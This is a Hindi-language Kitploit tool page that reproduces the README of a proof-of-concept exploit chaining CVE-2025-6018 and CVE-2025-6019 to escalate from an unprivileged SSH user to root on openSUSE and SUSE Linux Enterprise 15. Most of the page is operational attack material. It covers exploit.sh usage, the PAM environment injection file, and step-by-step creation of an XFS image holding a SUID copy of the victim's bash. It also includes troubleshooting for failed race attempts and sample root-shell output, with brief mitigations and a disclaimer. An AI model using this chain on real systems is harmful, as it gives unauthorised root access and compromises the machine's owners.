Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6018-6019 — CVE-2025-6018 CVE-2025-6019 PoC एक्सप्लॉइट - openSUSE/SUSE Linux Enterprise 15 में लोकल प्रिविलेज एस्केलेशन - PAM बाईपास + udisks2 XFS रेस कंडीशन LPE टू रूट | Kitploit
उपकरण/GitHubGitHub/desertdemons/cve-2025-6018-6019
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षाबाइनरी शोषण
GitHubdesertdemons/cve-2025-6018-6019

CVE-2025-6018-6019

CVE-2025-6018 CVE-2025-6019 PoC एक्सप्लॉइट - openSUSE/SUSE Linux Enterprise 15 में लोकल प्रिविलेज एस्केलेशन - PAM बाईपास + udisks2 XFS रेस कंडीशन LPE टू रूट

रिपॉजिटरी देखें
414 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-6018 CVE-2025-6019 PoC एक्सप्लॉइट

स्थानीय विशेषाधिकार वृद्धि (LPE) - openSUSE / SUSE Linux Enterprise 15

CVE-2025-6018 CVE-2025-6019 PoC Exploit License

CVE-2025-6018 और CVE-2025-6019 के लिए कार्यशील PoC/एक्सप्लॉइट - openSUSE Leap 15.x और SUSE Linux Enterprise 15.x पर बिना विशेषाधिकार वाले उपयोगकर्ता से root तक विशेषाधिकार वृद्धि

🎯 त्वरित सारांश

CVE IDभेद्यताप्रभाव
CVE-2025-6018PAM पर्यावरण चर इंजेक्शनallow_active polkit स्थिति के लिए बाईपास
CVE-2025-6019udisks2/libblockdev XFS रिसाइज़ रेस कंडीशनRoot शेल

आक्रमण श्रृंखला

root@kitploit:~
Unprivileged SSH User → [CVE-2025-6018] → allow_active → [CVE-2025-6019] → ROOT

🔥 प्रूफ ऑफ कॉन्सेप्ट डेमो

root@kitploit:~
# Check vulnerability
./exploit.sh --check

# Setup PAM bypass (CVE-2025-6018)
./exploit.sh --setup

# Reconnect SSH, then: su - $USER

# Exploit (CVE-2025-6019)
./exploit.sh --exploit /tmp/xfs.img

# Result: ROOT SHELL
uid=1000(user) gid=1000(user) euid=0(root)

📥 स्थापना

root@kitploit:~
git clone https://github.com/DesertDemons/CVE-2025-6018-6019.git
cd CVE-2025-6018-6019
chmod +x *.sh

🎯 प्रभावित सिस्टम

  • ✅ openSUSE Leap 15.0, 15.1, 15.2, 15.3, 15.4, 15.5, 15.6
  • ✅ SUSE Linux Enterprise Server (SLES) 15 SP1-SP6
  • ✅ SUSE Linux Enterprise Desktop (SLED) 15 SP1-SP6

⚠️ नोट: openSUSE Leap 15.6 30 अप्रैल 2026 को अपने जीवन-काल के अंत (End of Life) पर पहुँचता है। इस तिथि के बाद कोई सुरक्षा पैच जारी नहीं किया जाएगा। उपयोगकर्ताओं को Leap 16.0 या विस्तारित समर्थन वाले SLES पर माइग्रेट करना चाहिए।

भेद्य घटक

  • PAM (Linux-PAM 1.3.0 - 1.6.0) user_readenv=1 के साथ
  • udisks2 2.9.x libblockdev के साथ
  • polkit udisks2 क्रियाओं के लिए allow_active: yes के साथ

📖 उपयोग

विकल्प 1: भेद्यता जाँचें

root@kitploit:~
./exploit.sh --check

विकल्प 2: PAM बाईपास सेटअप करें (CVE-2025-6018)

root@kitploit:~
./exploit.sh --setup
# Then: exit SSH, reconnect, run: su - $USER

विकल्प 3: एक्सप्लॉइट (CVE-2025-6019)

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

विकल्प 4: पूर्ण ऑटो मोड

root@kitploit:~
./exploit.sh --auto /tmp/xfs.img

विकल्प 5: इमेज निर्माण निर्देश दिखाएँ

root@kitploit:~
./exploit.sh --create-image

🛠️ XFS पेलोड इमेज बनाना

ATTACKER मशीन पर root के रूप में चलाएँ:

⚠️ आपको पीड़ित की /usr/bin/bash बाइनरी का उपयोग करना ही होगा, अपनी स्थानीय बाइनरी का नहीं। किसी भिन्न डिस्ट्रो (Kali, Arch, Ubuntu, आदि) की bash बाइनरी glibc/साझा लाइब्रेरी ABI बेमेल के कारण टार्गेट पर विफल हो जाएगी — भले ही वही x86_64 आर्किटेक्चर हो।

हेल्पर स्क्रिप्ट का उपयोग करना (अनुशंसित)

स्क्रिप्ट आपके xfsprogs संस्करण का स्वतः पता लगाती है और सही फ़्लैग लागू करती है:

root@kitploit:~
# Get victim's bash first
scp user@target:/usr/bin/bash /tmp/victim_bash

# Create image (auto-detects safe mkfs flags)
sudo ./create_image.sh /tmp/victim_bash xfs.img

# For SUSE 15 SP1-SP4 targets (kernel < 5.14), use compatibility mode:
sudo ./create_image.sh --compat /tmp/victim_bash xfs.img

मैन्युअल निर्माण

root@kitploit:~
sudo su -

# 1. Get victim's bash binary
scp user@target:/usr/bin/bash /tmp/bash

# 2. Create 300MB XFS image with safe flags
dd if=/dev/zero of=xfs.img bs=1M count=300
mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img

# 3. Mount with SUID support
mkdir -p /tmp/mnt
mount -o loop,suid xfs.img /tmp/mnt

# 4. Copy victim's bash and set SUID bit
cp /tmp/bash /tmp/mnt/xpl
chmod 4755 /tmp/mnt/xpl
chown root:root /tmp/mnt/xpl
ls -la /tmp/mnt/xpl  # MUST show: -rwsr-xr-x

# 5. Unmount and transfer
umount /tmp/mnt
scp xfs.img user@target:/tmp/

XFS फ़ॉर्मेट संगतता

XFS इमेज अनिवार्य रूप से टार्गेट के कर्नेल के साथ संगत फ़्लैग के साथ फ़ॉर्मेट की जानी चाहिए। xfsprogs के नए संस्करण डिफ़ॉल्ट रूप से ऐसी ऑन-डिस्क सुविधाएँ सक्षम करते हैं जिन्हें पुराने SUSE कर्नेल नहीं पढ़ सकते, जिससे udisks2 रिसाइज़ माउंट के दौरान wrong fs type, bad superblock त्रुटियाँ उत्पन्न होती हैं।

टार्गेटकर्नेलmkfs.xfs कमांड
SUSE 15 SP5-SP65.14 / 6.4mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img
SUSE 15 SP1-SP44.12 - 5.3mkfs.xfs -f -m crc=0,reflink=0 xfs.img

क्यों? exchange और parent कर्नेल 6.10+ सुविधाएँ हैं (xfsprogs 6.x में डिफ़ॉल्ट रूप से सक्षम)। bigtime, inobtcount, और nrext64 कर्नेल 5.10+ सुविधाएँ हैं। SP1-SP4 "compat" कमांड (-m crc=0,reflink=0) सभी आधुनिक सुविधाओं को अक्षम करके V4 XFS फ़ॉर्मेट बनाता है, जो हर SUSE 15 SP पर काम करता है।

🔬 तकनीकी विवरण

CVE-2025-6018: PAM पर्यावरण इंजेक्शन

भेद्यता: PAM का pam_env मॉड्यूल user_readenv=1 (SUSE पर डिफ़ॉल्ट) के साथ ~/.pam_environment को पढ़ता है, जिससे पर्यावरण चर इंजेक्शन संभव होता है।

एक्सप्लॉइट: systemd-logind को धोखा देकर allow_active polkit विशेषाधिकार दिलाने के लिए XDG_SEAT=seat0 और XDG_VTNR=1 सेट करें।

root@kitploit:~
# ~/.pam_environment
XDG_SEAT=seat0
XDG_VTNR=1

CVE-2025-6019: XFS रिसाइज़ रेस कंडीशन

भेद्यता: udisks2 के माध्यम से XFS फाइलसिस्टम को रिसाइज़ करते समय, libblockdev फाइलसिस्टम को बिना nosuid फ़्लैग के अस्थायी रूप से माउंट करता है।

एक्सप्लॉइट:

  1. SUID root बाइनरी के साथ XFS इमेज बनाएँ
  2. लूप डिवाइस सेटअप करें
  3. D-Bus के माध्यम से रिसाइज़ ट्रिगर करें
  4. अस्थायी माउंट के दौरान SUID बाइनरी को निष्पादित करने के लिए रेस करें
  5. Root शेल प्राप्त करें

📋 पूर्ण एक्सप्लॉइटेशन वॉकथ्रू

चरण 1: भेद्यता जाँचें

root@kitploit:~
./exploit.sh --check

आउटपुट:

root@kitploit:~
[+] pam_env.so found in PAM configuration
[+] pam_systemd.so found - escalation vector available
[+] Target OS is vulnerable (openSUSE/SLES)
[-] allow_active status: NO

चरण 2: PAM बाईपास सेटअप करें

root@kitploit:~
./exploit.sh --setup
exit
ssh user@target
su - $USER

चरण 3: allow_active सत्यापित करें

root@kitploit:~
./exploit.sh --check

आउटपुट:

root@kitploit:~
[+] allow_active status: YES
    You have allow_active privileges!

चरण 4: XFS इमेज ट्रांसफर करें

root@kitploit:~
# On attacker:
scp xfs.img user@target:/tmp/

चरण 5: एक्सप्लॉइट

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

आउटपुट:

root@kitploit:~
[+] Loop device created: /dev/loop0
[+] Loop device verified as XFS
[*] Starting race condition loop...
[*] Triggering XFS resize on loop0...

=== ROOT SHELL OBTAINED ===
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)

root@target#

🔧 समस्या निवारण

🛡️ शमन

तत्काल समाधान

root@kitploit:~
# Disable user_readenv in PAM
sed -i 's/user_readenv=1/user_readenv=0/g' /etc/pam.d/common-auth

# Or restrict udisks2 polkit policy
# Change allow_active from "yes" to "auth_admin"

विक्रेता पैच

  • PAM, udisks2, और libblockdev पैकेज अपडेट करें
  • SUSE सुरक्षा सलाहकार (security advisories) जाँचें

📚 संदर्भ

  • Qualys सुरक्षा सलाहकार
  • Qualys तकनीकी विवरण
  • SUSE CVE-2025-6018
  • SUSE CVE-2025-6019
  • NVD CVE-2025-6018
  • NVD CVE-2025-6019

🏆 श्रेय

  • Qualys Threat Research Unit - मूल भेद्यता खोज
  • DesertDemons - PoC एक्सप्लॉइट विकास
  • Jazzruran - xfsprogs संस्करण बेमेल बग रिपोर्ट और फिक्स (#1)

⚠️ अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।

📄 लाइसेंस

MIT लाइसेंस


🔍 कीवर्ड्स

CVE-2025-6018 CVE-2025-6019 PoC Proof of Concept Exploit Privilege Escalation LPE Local Privilege Escalation Root openSUSE SUSE SLES PAM pam_env udisks2 libblockdev


⭐ यदि इस रेपो ने आपकी मदद की तो इसे स्टार करें! ⭐

टूल डाउनलोड करें
समस्याकारणसमाधान
allow_active: NOPAM बाईपास सक्रिय नहीं है--setup चलाएँ, SSH से बाहर निकलें, पुनः कनेक्ट करें और su - $USER चलाएँ
Image is not XFSगलत फाइलसिस्टम फ़ॉर्मेटmkfs.ext4 नहीं, mkfs.xfs उपयोग करें
SUID not workingअनुमतियाँ सेट नहीं हैंattacker मशीन पर -rwsr-xr-x अनुमतियाँ सत्यापित करें
Race condition missedटाइमिंग समस्याएक्सप्लॉइट फिर से चलाएँ (आमतौर पर 1-3 प्रयासों में काम करता है)
SUID बाइनरी सेगफॉल्ट या GLIBC_x.xx not foundगलत डिस्ट्रो की bash बाइनरी (glibc/ABI बेमेल)अपनी स्थानीय bash नहीं, scp के माध्यम से पीड़ित की /usr/bin/bash बाइनरी उपयोग करें
Resize output: Error resizing filesystem on /dev/loopN: Failed to mount '/dev/loopN' before resizing it: wrong fs type, bad option, bad superblock on /dev/loopN, missing codepage or helper program, or other errorXFS इमेज ऐसी सुविधाओं के साथ फ़ॉर्मेट की गई है जिन्हें टार्गेट कर्नेल नहीं पढ़ सकता (xfsprogs संस्करण बेमेल)SP5/SP6 के लिए mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img के साथ इमेज बनाएँ, या SP1-SP4 के लिए mkfs.xfs -f -m crc=0,reflink=0 xfs.img
XFS
Race Condition
Security
Vulnerability
Pentest